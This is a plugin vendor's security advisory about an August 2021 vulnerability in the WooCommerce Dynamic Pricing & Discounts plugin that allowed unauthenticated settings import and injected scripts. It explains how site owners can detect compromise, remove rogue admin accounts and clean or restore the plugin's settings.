What happened?
On August 19, 2021 we became aware of a critical security vulnerability in our WooCommerce Dynamic Pricing & Discounts plugin, versions 2.2 to 2.4.1. We patched this vulnerability in version 2.4.2 and introduced an extra layer of security measures in version 2.4.3.
This vulnerability allowed unauthenticated settings export and import. Settings import vulnerability allowed malicious actors to inject custom code into one of the text fields in plugin settings effectively launching an XSS attack.
It is known that malicious actors are using automatic tools to find websites that are running outdated versions of the plugin and launch attacks against them. In some cases such attacks result in unwanted malicious admin accounts being created, login details of which are known to the perpetrators and thus could be used to launch further attacks manually.
All users should update the plugin immediately and follow instructions provided below.
We are sorry that a human mistake on our end caused so much distress to our clients. We are standing by to help anyone affected by this vulnerability and will implement measures to reduce the risk of human mistakes in our development process.
How to tell if my site was targeted?
Check for any of these signs:
- Plugin settings have changed without your intervention, text fields in plugin settings contain pieces of unfamiliar code (check label, title, description, note fields across all tabs).
- You or visitors to your website are being redirected to other websites/pages.
- There are new users in the WordPress users list that you do not recognise (commonly reported username is mainwpadmin but could be anything).
What should I do if my site was targeted?
It is important to understand that:
- The plugin itself does not contain any malicious code and is not "infected".
- Vulnerability allowed perpetrators to inject malicious code into text fields in settings.
- Updating the plugin does not automatically remove malicious code that was inserted or fix other consequences of a previous attack - further actions need to be taken.
You should take the following actions to recover:
- Disable the plugin immediately.
- Update the plugin to version 2.4.3 (or later version if available). If you are using native automatic updates, do this just before disabling the plugin, otherwise automatic update option won't be available.
- Go to WordPress users list of your website and delete all users that look suspicious, are unknown to you and/or other persons working on your site.
- Got to WooCommerce > Pricing & Discounts and review settings under all tabs. Look for unusual content in text fields, remove it and submit your changes. Alternatively, you can clear all existing settings at once by either importing a blank settings file provided at the bottom of this article or deleting a row with key rp_wcdpd_settings from the wp_options table in your database.
- If possible, restore plugin settings from an unaffected backup, more details below.
- Enable the plugin and continue monitoring your website for any suspicious activity.
There are three potential ways to recover your previous settings:
- Import previously exported settings file, if you have one.
- Recover settings from a full site database backup. Your server administrator or hosting service provider may be able to help. Plugin settings are stored in database table wp_options (prefix may vary) under key rp_wcdpd_settings. You may replace this record in your existing database from a backup source.
- Since version 2.4, the plugin is saving a copy of its settings during every plugin update. These copies are saved in database table wp_options under keys rp_wcdpd_settings_backup_{timestamp}. You can check your existing database for these backup records and copy their contents to the main rp_wcdpd_settings record.
Keep in mind that if settings backup was performed after settings were injected with malicious code, restoring settings from a backup will also restore malicious code. You should use a backup that was made before the attack. If not sure, please get in touch with us and we will help you.
What should I do if my site was not targeted?
- Update the plugin to version 2.4.3 (or later version if available) immediately.
- Continue checking your website periodically for any signs of malicious activity.
How do I update the plugin?
Please check this article which covers different methods that can be used. We recommend enabling native automatic updates which is the fastest and most reliable way to get latest updates whenever they come out.
Can you help me?
If you were affected by this vulnerability and need help or if you have any questions related to this topic, feel free to get in touch with us via this support site and we will do the best we can to help you.
Blank settings export/import file
You can use a blank settings export/import file to completely overwrite settings on your installation if this is needed. To import this file look for the following section under WooCommerce > Pricing & Discounts > Settings in the admin area of your website:
Click on the link below to download a blank settings export/import file: